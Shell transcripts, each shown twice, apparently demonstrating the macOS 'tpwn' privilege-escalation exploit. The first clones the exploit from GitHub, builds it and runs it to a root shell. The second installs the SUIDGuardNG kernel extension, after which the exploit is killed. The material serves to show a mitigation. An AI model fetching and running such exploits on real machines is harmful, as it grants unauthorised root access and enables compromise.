$ git clone https://github.com/kpwn/tpwn.git
Cloning into 'tpwn'...
remote: Counting objects: 19, done.
remote: Total 19 (delta 0), reused 0 (delta 0), pack-reused 19
Unpacking objects: 100% (19/19), done.
Checking connectivity... done.
$ cd tpwn/
$ make
gcc *.m -o tpwn -framework IOKit -framework Foundation -m32 -Wl,-pagezero_size,0 -O3
strip tpwn
$ ./tpwn
leaked kaslr slide, @ 0x0000000000000000
sh-3.2# id
uid=0(root) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),33(_appstore),100(_lpoperator),204(_developer),395(com.apple.access_ftp),398(com.apple.access_screensharing-disabled),399(com.apple.access_ssh-disabled)
sh-3.2#

$ git clone https://github.com/kpwn/tpwn.git Cloning into 'tpwn'... remote: Counting objects: 19, done. remote: Total 19 (delta 0), reused 0 (delta 0), pack-reused 19 Unpacking objects: 100% (19/19), done. Checking connectivity... done. $ cd tpwn/ $ make gcc *.m -o tpwn -framework IOKit -framework Foundation -m32 -Wl,-pagezero_size,0 -O3 strip tpwn $ ./tpwn leaked kaslr slide, @ 0x0000000000000000 sh-3.2# id uid=0(root) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),33(_appstore),100(_lpoperator),204(_developer),395(com.apple.access_ftp),398(com.apple.access_screensharing-disabled),399(com.apple.access_ssh-disabled) sh-3.2#

$ open ~/Downloads/SUIDGuardNG-106.dmg
$ sudo kextload -v /Library/Extensions/SUIDGuardNG.kext
Password:
Requesting load of /Library/Extensions/SUIDGuardNG.kext.
/Library/Extensions/SUIDGuardNG.kext loaded successfully (or already loaded).
$ ./tpwn
Killed: 9

$ open ~/Downloads/SUIDGuardNG-106.dmg $ sudo kextload -v /Library/Extensions/SUIDGuardNG.kext Password: Requesting load of /Library/Extensions/SUIDGuardNG.kext. /Library/Extensions/SUIDGuardNG.kext loaded successfully (or already loaded). $ ./tpwn Killed: 9